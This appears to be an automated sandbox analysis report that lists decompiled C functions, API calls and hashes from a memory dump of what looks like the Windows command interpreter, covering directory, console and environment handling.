                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: ELSE$IF/?
                                • API String ID: 2081463915-1134991328
                                • Opcode ID: 3c89ca4e37a7368773cb8be8cd0c3644e5b09d05190fb4b873002546af1d0003
                                • Instruction ID: 5879bea5e433e9aaf6aacac09df8f89d1317c724bd5fa2e065d02b151130ea27
                                • Opcode Fuzzy Hash: 3c89ca4e37a7368773cb8be8cd0c3644e5b09d05190fb4b873002546af1d0003
                                • Instruction Fuzzy Hash: 82113BB16453427AE3117BB59F85E6B6EBCDF861D4B00003FE202EA58FDA21C800C231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5600DD, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E4A5600DD(void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v10;
				short _v12;
				void* _v14;
				char _v16;
				short _v530;
				short _v532;
				short _v534;
				short _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				short _t25;
				WCHAR* _t28;
				short _t31;
				int _t37;
				void* _t45;
				void* _t46;
				void* _t51;
				WCHAR* _t52;
				void* _t53;
				signed int _t54;

				_t51 = __edx;
				_t20 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t20 ^ _t54;
				_t22 = 0x3d;
				_v16 = _t22;
				_v14 = _a4 + 0x40;
				_t25 = 0x3a;
				_v12 = _t25;
				_v10 = 0;
				_t28 = E4A552070( &_v16);
				_t53 = SetCurrentDirectoryW;
				_t45 = SetErrorMode;
				_t52 = _t28;
				if(_t52 == 0) {
					L4:
					_v536 = _v14;
					_v534 = _v12;
					_t31 =  *0x4a590664; // 0x5c
					_v532 = _t31;
					_v530 = 0;
					E4A551730( &_v16,  &_v536);
					_t37 = SetCurrentDirectoryW( &_v536);
					if(_t37 == 0) {
						_push(_t37);
						_push(GetLastError());
						E4A556D44(_t46);
					}
					if(_t52 != 0) {
						SetErrorMode(_v540);
					}
					L2:
					return E4A5513A9(E4A552C56(_t45, _t51, _t52, 0x4a575260, 0x104, 0), _t45, _v8 ^ _t54, _t51, _t52, _t53);
				}
				if(SetCurrentDirectoryW(_t52) == 0) {
					_v540 = SetErrorMode(1);
					goto L4;
				}
				goto L2;
			}




























                                0x4a5600dd
                                0x4a5600e8
                                0x4a5600ef
                                0x4a5600f7
                                0x4a5600f8
                                0x4a560102
                                0x4a560108
                                0x4a560109
                                0x4a56010f
                                0x4a560117
                                0x4a56011c
                                0x4a560122
                                0x4a560128
                                0x4a56012c
                                0x4a569bb1
                                0x4a569bb5
                                0x4a569bc0
                                0x4a569bc7
                                0x4a569bcd
                                0x4a569bd6
                                0x4a569be8
                                0x4a569bf4
                                0x4a569bf8
                                0x4a569bfa
                                0x4a569c01
                                0x4a569c02
                                0x4a569c08
                                0x4a569c0b
                                0x4a569c17
                                0x4a569c17
                                0x4a56013d
                                0x4a56015c
                                0x4a56015c
                                0x4a560137
                                0x4a569bab
                                0x00000000
                                0x4a569bab
                                0x00000000

                                APIs
                                  • Part of subcall function 4A552070: GetEnvironmentVariableW.KERNEL32(?,4A580640,00002000,74CBF670,?,?,4A55BEFF,00000000), ref: 4A55208E
                                • SetCurrentDirectoryW.KERNEL32(00000000,00000006,4A58C642,0000233F,00000000), ref: 4A560133
                                • SetErrorMode.KERNEL32(00000001), ref: 4A569BA9
                                • SetCurrentDirectoryW.KERNEL32(?,00000006,?,00000006,4A58C642,0000233F,00000000), ref: 4A569BF4
                                • GetLastError.KERNEL32(00000000), ref: 4A569BFB
                                • SetErrorMode.KERNEL32(?), ref: 4A569C17
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Error$CurrentDirectoryMode$EnvironmentLastVariable
                                • String ID:
                                • API String ID: 295791303-0
                                • Opcode ID: dee7caeddbf16ee7056bf45167fa639dbfc3b9e0959c4c3f74682244c68c8898
                                • Instruction ID: 06f98318296179cd2ef5794299bdf212ba1633605cf405c397d747aac33a92c3
                                • Opcode Fuzzy Hash: dee7caeddbf16ee7056bf45167fa639dbfc3b9e0959c4c3f74682244c68c8898
                                • Instruction Fuzzy Hash: 6521B079D0020DAADB11EBA4DE44BDEBBB8AF45744F014497E508EB254EB308A85CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557BDB, Relevance: 7.6, APIs: 5, Instructions: 69threadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A557BDB() {
				int _t4;
				signed int _t7;
				void* _t8;
				int _t10;
				signed int _t12;
				int* _t15;
				void* _t18;
				void* _t19;
				intOrPtr _t21;

				_t4 = GetConsoleOutputCP();
				 *0x4a5741b8 = _t4;
				if(GetCPInfo(_t4, 0x4a574260) == 0) {
					_t7 = GetThreadLocale() & 0x000003ff;
					__eflags = _t7 - 0x11;
					if(_t7 != 0x11) {
						__eflags = _t7 - 4;
						if(_t7 == 4) {
							L8:
							 *0x4a574266 = 0x81;
							 *0x4a574267 = 0xfe;
							 *0x4a574268 = 0;
							 *0x4a574269 = 0;
							goto L1;
						}
						__eflags = _t7 - 0x12;
						if(_t7 != 0x12) {
							 *0x4a574266 = 0;
							 *0x4a574267 = 0;
							goto L1;
						}
						goto L8;
					}
					 *0x4a574266 = 0x81;
					 *0x4a574267 = 0x9f;
					 *0x4a574268 = 0xe0;
					 *0x4a574269 = 0xfc;
					 *0x4a57426a = 0;
					 *0x4a57426b = 0;
				}
				L1:
				_t8 = memset(0x4a574e40, 0, 0x100);
				_t19 = _t18 + 0xc;
				_t21 =  *0x4a574266; // 0x0
				if(_t21 != 0) {
					_t15 = 0x4a574267;
					while(1) {
						_t8 =  *_t15;
						__eflags = _t8;
						if(_t8 == 0) {
							break;
						}
						_t1 = _t15 - 1; // 0x0
						_t12 =  *_t1 & 0x000000ff;
						_t8 = _t8 & 0x000000ff;
						__eflags = _t12 - _t8;
						if(_t12 <= _t8) {
							_t10 = _t8 - _t12 + 1;
							__eflags = _t10;
							_t2 = 0x4a574e40 + _t12; // 0x4a574e40
							_t8 = memset(_t2, 1, _t10);
							_t19 = _t19 + 0xc;
						}
						_t15 =  &(_t15[0]);
						__eflags =  *(_t15 - 1);
						if( *(_t15 - 1) != 0) {
							continue;
						}
						break;
					}
					 *0x4a574084 = 1;
					__eflags =  *0x4a574267; // 0x0
					if(__eflags == 0) {
						goto L2;
					}
					return _t8;
				}
				L2:
				 *0x4a574084 = 0;
				return _t8;
			}












                                0x4a557bde
                                0x4a557bea
                                0x4a557bf9
                                0x4a56b8ea
                                0x4a56b8ef
                                0x4a56b8f3
                                0x4a56b922
                                0x4a56b926
                                0x4a56b92e
                                0x4a56b92e
                                0x4a56b935
                                0x4a56b93c
                                0x4a56b942
                                0x00000000
                                0x4a56b942
                                0x4a56b928
                                0x4a56b92c
                                0x4a56b94d
                                0x4a56b953
                                0x00000000
                                0x4a56b953
                                0x00000000
                                0x4a56b92c
                                0x4a56b8f5
                                0x4a56b8fc
                                0x4a56b903
                                0x4a56b90a
                                0x4a56b911
                                0x4a56b917
                                0x4a56b917
                                0x4a557bff
                                0x4a557c0a
                                0x4a557c0f
                                0x4a557c12
                                0x4a557c18
                                0x4a56b95f
                                0x4a56b964
                                0x4a56b964
                                0x4a56b966
                                0x4a56b968
                                0x00000000
                                0x00000000
                                0x4a56b96a
                                0x4a56b96a
                                0x4a56b96e
                                0x4a56b971
                                0x4a56b973
                                0x4a56b977
                                0x4a56b977
                                0x4a56b979
                                0x4a56b982
                                0x4a56b987
                                0x4a56b987
                                0x4a56b98b
                                0x4a56b98c
                                0x4a56b98f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56b98f
                                0x4a56b992
                                0x4a56b999
                                0x4a56b99f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56b99f
                                0x4a557c1e
                                0x4a557c1e
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ConsoleInfoLocaleOutputThread
                                • String ID:
                                • API String ID: 1263632223-0
                                • Opcode ID: 4385b737c321f661d38536c27f7d7700bd6bc6080524279d1c649802d08449cf
                                • Instruction ID: 30b3068a9d8807363aebc42f4f6bb58d2c35204ee7092013d753d7fc8f182ffe
                                • Opcode Fuzzy Hash: 4385b737c321f661d38536c27f7d7700bd6bc6080524279d1c649802d08449cf
                                • Instruction Fuzzy Hash: 7A21FBFD48D2C19DD321AA3817145603FBC59A3320F1906ABF4D4EBDB9D1610D55D32B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56CF50, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E4A56CF50(int __eax) {
				int _v8;
				char* _v12;
				int _v16;
				char* _t17;
				signed int _t18;
				short* _t24;
				short* _t31;
				short _t32;
				int _t33;
				short* _t36;

				_push(0);
				_push(0);
				_v8 = 1;
				L4A572410();
				_t33 = __eax;
				if(__eax != 0) {
					_t36 = E4A552041(__eax + __eax);
					_t17 = E4A552041(_t33);
					_push(_t17);
					_push(_t33);
					_v12 = _t17;
					L4A572410();
					_t18 = E4A554B8D( *0x4a5741b8);
					asm("sbb eax, eax");
					MultiByteToWideChar( *0x4a5741b8,  ~( ~_t18), _v12, 0xffffffff, _t36, _t33);
					_v16 = SetErrorMode(1);
					while( *_t36 != 0) {
						E4A556C78(_t36, _v8);
						_t24 = _t36;
						_v8 = 0;
						_t8 =  &(_t24[1]); // 0x2
						_t31 = _t8;
						do {
							_t32 =  *_t24;
							_t24 =  &(_t24[1]);
						} while (_t32 != 0);
						_t36 = _t36 + 2 + (_t24 - _t31 >> 1) * 2;
					}
					SetErrorMode(_v16);
					return E4A55142E(_v12);
				}
				return __eax;
			}













                                0x4a56cf5c
                                0x4a56cf5d
                                0x4a56cf5e
                                0x4a56cf65
                                0x4a56cf6a
                                0x4a56cf6e
                                0x4a56cf7f
                                0x4a56cf81
                                0x4a56cf86
                                0x4a56cf87
                                0x4a56cf88
                                0x4a56cf8b
                                0x4a56cf9d
                                0x4a56cfa4
                                0x4a56cfaf
                                0x4a56cfbf
                                0x4a56cfe7
                                0x4a56cfc8
                                0x4a56cfcd
                                0x4a56cfcf
                                0x4a56cfd2
                                0x4a56cfd2
                                0x4a56cfd5
                                0x4a56cfd5
                                0x4a56cfd9
                                0x4a56cfda
                                0x4a56cfe3
                                0x4a56cfe3
                                0x4a56cfef
                                0x00000000
                                0x4a56cff9
                                0x4a56cffd

                                APIs
                                • GetVDMCurrentDirectories.KERNEL32(00000000,00000000), ref: 4A56CF65
                                • GetVDMCurrentDirectories.KERNEL32(00000000,00000000), ref: 4A56CF8B
                                • MultiByteToWideChar.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,4A551794,=ExitCode), ref: 4A56CFAF
                                • SetErrorMode.KERNEL32(00000001), ref: 4A56CFBD
                                • SetErrorMode.KERNEL32(00000000,00000000,00000001), ref: 4A56CFEF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CurrentDirectoriesErrorMode$ByteCharMultiWide
                                • String ID:
                                • API String ID: 3679696385-0
                                • Opcode ID: 61d15a5befc2e18b75c5f3473a3dc8f71026af5bf79cd36005d11e7433504f78
                                • Instruction ID: a9217a8d16895b8cacdb2fc1ebe0692591e5c0e835b1895a004e75c92abac175
                                • Opcode Fuzzy Hash: 61d15a5befc2e18b75c5f3473a3dc8f71026af5bf79cd36005d11e7433504f78
                                • Instruction Fuzzy Hash: 9811C17580011ABECB017FA5CE48CAEBBBDEF85318B114526E502F7169DA715E80CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55D43C, Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                Download Yara Rule
                                C-Code - Quality: 60%
                                			E4A55D43C(void* __ecx, void* __edi, void* __esi) {
				struct _CHAR_INFO _v8;
				struct _COORD _v12;
				struct _SMALL_RECT _v20;
				short _v38;
				signed int _v42;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v44;
				void* _t20;
				union %anon259 _t33;
				void* _t45;

				if(E4A553B03(_t20, __ecx, 1) == 0) {
					_push(E4A567CA8);
					E4A5558F3();
				} else {
					_t45 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t45,  &_v44) == 0) {
						_push(E4A567CA8);
						E4A5558F3();
					} else {
						_v12.Y =  ~_v42;
						_v12.X = 0;
						_v20.Top = 0;
						_v20.Left = 0;
						_v20.Bottom = _v42;
						_v20.Right = _v44.dwSize;
						_t33 = 0x20;
						_v8.UnicodeChar = _t33;
						_v8.Attributes = _v44.wAttributes;
						ScrollConsoleScreenBufferW(_t45,  &_v20, 0, _v12,  &_v8);
						_v44.dwCursorPosition.X = 0;
						_v38 = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), _v44.dwCursorPosition);
					}
				}
				return 0;
			}












                                0x4a55d44d
                                0x4a567c87
                                0x4a567c8c
                                0x4a55d453
                                0x4a55d45f
                                0x4a55d46e
                                0x4a567c97
                                0x4a567c9c
                                0x4a55d474
                                0x4a55d479
                                0x4a55d47f
                                0x4a55d483
                                0x4a55d487
                                0x4a55d48f
                                0x4a55d499
                                0x4a55d49d
                                0x4a55d49e
                                0x4a55d4a6
                                0x4a55d4b8
                                0x4a55d4c0
                                0x4a55d4c4
                                0x4a55d4d0
                                0x4a55d4d0
                                0x4a55d4d7
                                0x4a55d4db

                                APIs
                                  • Part of subcall function 4A553B03: _get_osfhandle.MSVCRT ref: 4A553B0D
                                  • Part of subcall function 4A553B03: GetFileType.KERNEL32 ref: 4A553B17
                                • GetStdHandle.KERNEL32(000000F5,?,?,00000001), ref: 4A55D45D
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A55D466
                                • ScrollConsoleScreenBufferW.KERNEL32(00000000,?,00000000,?,?), ref: 4A55D4B8
                                • GetStdHandle.KERNEL32(000000F5,?,?,?,00000001), ref: 4A55D4CD
                                • SetConsoleCursorPosition.KERNEL32 ref: 4A55D4D0
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                • String ID:
                                • API String ID: 3008996577-0
                                • Opcode ID: cb602c15112ce2da77d4d48b413969d973a31bd8c84a534f0cc4dc5d7a50959c
                                • Instruction ID: 86d2a01a67e6d6c87d684b29ede184f6b48e26896a6eb5ece2366fa3f369ff24
                                • Opcode Fuzzy Hash: cb602c15112ce2da77d4d48b413969d973a31bd8c84a534f0cc4dc5d7a50959c
                                • Instruction Fuzzy Hash: 6211813A910249BACB00EFE4C904EEE7BB8BF4D724F105157E514F3154EB308A40C766
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557C89, Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A557C89() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x4a5740ac; // 0xbb40e64e
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 != 0xbb40e64e) {
					if((0xffff0000 & _t14) == 0) {
						goto L1;
					}
					_t23 =  !_t14;
					 *0x4a5740b0 = _t23;
					return _t23;
				}
				L1:
				GetSystemTimeAsFileTime( &_v12);
				_t16 = GetCurrentProcessId();
				_t17 = GetCurrentThreadId();
				_t18 = GetTickCount();
				QueryPerformanceCounter( &_v20);
				_t22 = _v16 ^ _v20.LowPart;
				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
				if(_t32 == 0xbb40e64e || ( *0x4a5740ac & 0xffff0000) == 0) {
					_t32 = 0xbb40e64f;
				}
				 *0x4a5740ac = _t32;
				 *0x4a5740b0 =  !_t32;
				return _t22;
			}













                                0x4a557c91
                                0x4a557c96
                                0x4a557c9a
                                0x4a557cac
                                0x4a56bc8e
                                0x00000000
                                0x00000000
                                0x4a56bc94
                                0x4a56bc96
                                0x00000000
                                0x4a56bc96
                                0x4a557cb2
                                0x4a557cb7
                                0x4a557cc3
                                0x4a557ccb
                                0x4a557cd3
                                0x4a557cdf
                                0x4a557ce8
                                0x4a557ceb
                                0x4a557cef
                                0x4a557d0c
                                0x4a557d0c
                                0x4a557cf9
                                0x4a557d01
                                0x00000000

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 4A557CB7
                                • GetCurrentProcessId.KERNEL32 ref: 4A557CC3
                                • GetCurrentThreadId.KERNEL32 ref: 4A557CCB
                                • GetTickCount.KERNEL32 ref: 4A557CD3
                                • QueryPerformanceCounter.KERNEL32(?), ref: 4A557CDF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                • String ID:
                                • API String ID: 1445889803-0
                                • Opcode ID: ca0fe0a2d4b830f88ca56c7bfbc7198179c93896d0ad6d8be3ea67209f0dc027
                                • Instruction ID: a04e703c4d07c5246edb3f540e38a7ec2c826f5b84963e3c5e5be009e363f38e
                                • Opcode Fuzzy Hash: ca0fe0a2d4b830f88ca56c7bfbc7198179c93896d0ad6d8be3ea67209f0dc027
                                • Instruction Fuzzy Hash: 331130B6D012149BCB10ABF4CA486AABBF8BF49355F420953E801E7618D7309D008F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A553BE0, Relevance: 7.5, APIs: 5, Instructions: 33synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A553BE0(void* __ecx, void* _a4) {
				long _v8;
				int _t11;

				_v8 = _v8 | 0xffffffff;
				 *0x4a574088 = 0;
				WaitForSingleObject(_a4, 0xffffffff);
				_t11 = GetExitCodeProcess(_a4,  &_v8);
				if(_v8 == 0xc000013a) {
					E4A56E702(_t11);
					fprintf(__imp___iob + 0x40, 0x4a56bd48);
					fflush(__imp___iob + 0x40);
				}
				 *0x4a574088 = 1;
				CloseHandle(_a4);
				return _v8;
			}





                                0x4a553be6
                                0x4a553bef
                                0x4a553bf6
                                0x4a553c03
                                0x4a553c10
                                0x4a569a6f
                                0x4a569a82
                                0x4a569a91
                                0x4a569a97
                                0x4a553c19
                                0x4a553c20
                                0x4a553c2a

                                APIs
                                • WaitForSingleObject.KERNEL32(4A574210,000000FF,?,?,4A56FD89,4A574210,?,4A5677AE,?,00000000,4A58C642,0000233F,4A563801,4A58C642,0000233F,00000000), ref: 4A553BF6
                                • GetExitCodeProcess.KERNEL32(4A574210,000000FF), ref: 4A553C03
                                • CloseHandle.KERNEL32(4A574210), ref: 4A553C20
                                • fprintf.MSVCRT ref: 4A569A82
                                • fflush.MSVCRT ref: 4A569A91
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                • String ID:
                                • API String ID: 1826527819-0
                                • Opcode ID: bb9756194009b21a6881ee5cbed32f46a65347a227bf117ce30bd8c6d236b68a
                                • Instruction ID: 98fc662a5b217951a93e93f86fcddedcb7f22918b3a643e7342dc264c6ac1fd9
                                • Opcode Fuzzy Hash: bb9756194009b21a6881ee5cbed32f46a65347a227bf117ce30bd8c6d236b68a
                                • Instruction Fuzzy Hash: 6FF019F9406185EBDB00BB64CA08A897FFCBB0236DF104142F819EB6B9C7319E50DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5516AD, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A5516AD() {
				int _t9;
				WCHAR* _t11;
				void* _t12;

				_t11 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t11 != 0) {
					_t9 = E4A5516FB(_t11);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t11, _t9);
					}
					FreeEnvironmentStringsW(_t11);
				}
				return _t12;
			}






                                0x4a5516b7
                                0x4a5516b9
                                0x4a5516bd
                                0x4a5516c6
                                0x4a5516d8
                                0x4a5516dc
                                0x4a5516e1
                                0x4a5516e6
                                0x4a5516ea
                                0x4a5516f0
                                0x4a5516f5

                                APIs
                                • GetEnvironmentStringsW.KERNEL32(?,4A574210,4A557AF8,4A558533), ref: 4A5516B1
                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000), ref: 4A5516CB
                                • HeapAlloc.KERNEL32(00000000), ref: 4A5516D2
                                • memcpy.MSVCRT ref: 4A5516E1
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 4A5516EA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                • String ID:
                                • API String ID: 713576409-0
                                • Opcode ID: 897005445617a909708f626f2a77a93f6819f9535ac81aa83344a2298c060e07
                                • Instruction ID: 3b824158955ad24440820612381e7160263ef3cae66fe04b0a2746894a8c6e16
                                • Opcode Fuzzy Hash: 897005445617a909708f626f2a77a93f6819f9535ac81aa83344a2298c060e07
                                • Instruction Fuzzy Hash: 9CE092B25031216B921232A9AE88C7B6E7CFFC6AED7070113F905D6A1CDB708C0247A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55B589, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 309COMMON
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E4A55B589(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24, intOrPtr* _a28, signed int* _a32) {
				signed int _v8;
				short _v524;
				short _v526;
				char _v528;
				intOrPtr _v532;
				intOrPtr* _v536;
				WCHAR* _v540;
				signed int* _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				intOrPtr* _t73;
				signed int _t75;
				intOrPtr* _t78;
				intOrPtr _t84;
				intOrPtr* _t85;
				short _t87;
				WCHAR* _t96;
				signed char _t100;
				long _t106;
				intOrPtr* _t118;
				intOrPtr* _t122;
				signed int _t128;
				intOrPtr* _t129;
				short _t131;
				intOrPtr* _t133;
				signed int _t135;
				signed int _t136;
				intOrPtr _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				WCHAR* _t145;
				intOrPtr _t149;
				signed int _t150;
				intOrPtr* _t151;
				signed int _t153;
				WCHAR* _t155;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t162;
				signed int _t165;
				short* _t166;
				signed int _t167;
				void* _t168;
				signed int _t170;
				signed int* _t171;
				void* _t172;
				intOrPtr _t173;
				signed int _t177;
				intOrPtr* _t181;
				signed int _t183;
				void* _t184;
				signed int _t187;
				void* _t209;

				_t147 = __ecx;
				_t63 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t63 ^ _t187;
				_v532 = _a12;
				_v540 = _a20;
				_v536 = _a28;
				_v544 = _a32;
				E4A559A0D(__ecx, E4A55321B(__ecx, L"COPYCMD"), _a8);
				_t143 = E4A5522CA( *((intOrPtr*)(_a4 + 0x3c)), 0, 0);
				if(E4A559A0D(_t147, _t143, _a8) == 0) {
					L2:
					_t73 = _t143;
					_t13 = _t73 + 2; // 0x2
					_t166 = _t13;
					do {
						_t148 =  *_t73;
						_t73 = _t73 + 2;
					} while (_t148 != 0);
					_t75 = _t73 - _t166;
					_t170 = _t75 >> 1;
					if(_t75 == 0) {
						L42:
						_push(0x232a);
						L43:
						L4A56DF02(_t148, _t166);
						L44:
						_push( *0x4a574128);
						goto L43;
					}
					if(_t170 >= 0x104) {
						L35:
						_push(0x232e);
						goto L43;
					}
					_t78 = _t143;
					_t14 = _t78 + 2; // 0x2
					_t166 = _t14;
					do {
						_t149 =  *_t78;
						_t78 = _t78 + 2;
						_t194 = _t149;
					} while (_t149 != 0);
					E4A55185A(_t143, (_t78 - _t166 >> 1) + 1, E4A552598(_t149, _t143));
					_t84 = E4A559662(_t149, _t166, _t194, _t143);
					_t148 = _v536;
					 *_v536 = _t84;
					if(_t84 == 1) {
						goto L44;
					}
					_t17 = _t170 * 2; // 0x2
					_t181 = _t143 + _t17 + 2;
					if( *_t181 == 0) {
						_t85 =  *0x4a574124; // 0x0
						_v528 =  *_t85;
						_t87 = 0x3a;
						_v526 = _t87;
						_v524 = 0;
						L18:
						_t182 = _a16;
						if(E4A552FAF(_t148, _v532, _a16, _t143) != 0) {
							goto L35;
						}
						_t144 = _v536;
						if(( *( *( *_t144 + 0x18)) & 0x00000010) == 0) {
							_t172 = E4A552148(_v532,  *0x4a590664 & 0x0000ffff);
							if(_t172 == 0) {
								_t173 = _v532;
							} else {
								_t173 = _t172 + 2;
							}
							if(E4A552148( *((intOrPtr*)( *_t144 + 0x10)),  *0x4a590664 & 0x0000ffff) == 0) {
								_t111 =  *((intOrPtr*)( *_t144 + 0x10));
							}
							E4A55185A(_t173, _t182 - (_t173 - _v532 >> 1), _t111);
						}
						_t145 = _v540;
						if(E4A552FAF(_t148, _t145, _a24,  &_v528) != 0) {
							goto L35;
						} else {
							_t183 = 0;
							 *0x4a574128 = 0;
							SetLastError(0);
							_t171 = _v544;
							 *_t171 =  *_t171 & 0;
							_t209 =  *((intOrPtr*)(E4A552ED1(_t145))) -  *0x4a590664; // 0x5c
							if(_t209 == 0) {
								_t96 = _t145;
								_t183 = 1;
								__eflags = 1;
								_t166 =  &(_t96[1]);
								do {
									_t150 =  *_t96;
									_t96 =  &(_t96[1]);
									__eflags = _t150;
								} while (_t150 != 0);
								_t148 = 0;
								 *((short*)(_t145 + (_t96 - _t166 >> 1) * 2 - 2)) = 0;
							}
							_t100 = GetFileAttributesW(_t145);
							if(_t100 != 0xffffffff) {
								__eflags = _t100 & 0x00000010;
								if((_t100 & 0x00000010) != 0) {
									_t183 = 1;
									 *_t171 = 1;
								}
								L30:
								if(_t183 != 0) {
									_t151 = E4A552148(_v532,  *0x4a590664 & 0x0000ffff);
									_t41 = _t151 + 2; // 0x2
									_t184 = _t41;
									do {
										_t167 =  *_t151;
										_t151 = _t151 + 2;
										__eflags = _t167;
									} while (_t167 != 0);
									_t153 = _t151 - _t184;
									__eflags = _t153;
									_t183 = _t153 >> 1;
									_t155 = _t145;
									_t166 =  &(_t155[1]);
									do {
										_t171 =  *_t155;
										_t155 =  &(_t155[1]);
										__eflags = _t171;
									} while (_t171 != 0);
									_t158 = _t155 - _t166 >> 1;
									_t148 = _t158 + _t183 + 1;
									__eflags = _t158 + _t183 + 1 - 0x104;
									if(_t158 + _t183 + 1 > 0x104) {
										goto L35;
									}
									E4A5520A9(_t183, _t145, _a24, _t102);
								}
								return E4A5513A9(0, _t145, _v8 ^ _t187, _t166, _t171, _t183);
							}
							_t106 = GetLastError();
							 *0x4a574128 = _t106;
							if(_t106 == 0 || _t106 == 2) {
								goto L30;
							} else {
								__eflags = _t106 - 3;
								if(_t106 == 3) {
									goto L30;
								}
								_push(_t106);
								goto L43;
							}
						}
					}
					if( *((short*)(E4A55413B(_t181))) != 0) {
						goto L42;
					}
					_t118 = _t181;
					_t19 = _t118 + 2; // 0x4
					_t166 = _t19;
					do {
						_t148 =  *_t118;
						_t118 = _t118 + 2;
					} while (_t148 != 0);
					if(_t118 - _t166 >> 1 > 0x104) {
						goto L35;
					}
					_t122 = _t181;
					_t20 = _t122 + 2; // 0x4
					_t166 = _t20;
					do {
						_t148 =  *_t122;
						_t122 = _t122 + 2;
					} while (_t148 != 0);
					E4A55185A(_t181, (_t122 - _t166 >> 1) + 1, E4A552598(_t148, _t181));
					_t128 =  *(_t181 + 2) & 0x0000ffff;
					if(_t128 != 0x3a) {
						__eflags =  *_t181 - 0x5c;
						if( *_t181 != 0x5c) {
							L48:
							_t129 =  *0x4a574124; // 0x0
							_v528 =  *_t129;
							_t131 = 0x3a;
							_v526 = _t131;
							__eflags = 0;
							_v524 = 0;
							_t133 =  &_v528;
							_t168 = _t133 + 2;
							do {
								_t161 =  *_t133;
								_t133 = _t133 + 2;
								__eflags = _t161;
							} while (_t161 != 0);
							_t135 = _t133 - _t168;
							__eflags = _t135;
							_t162 = _t181;
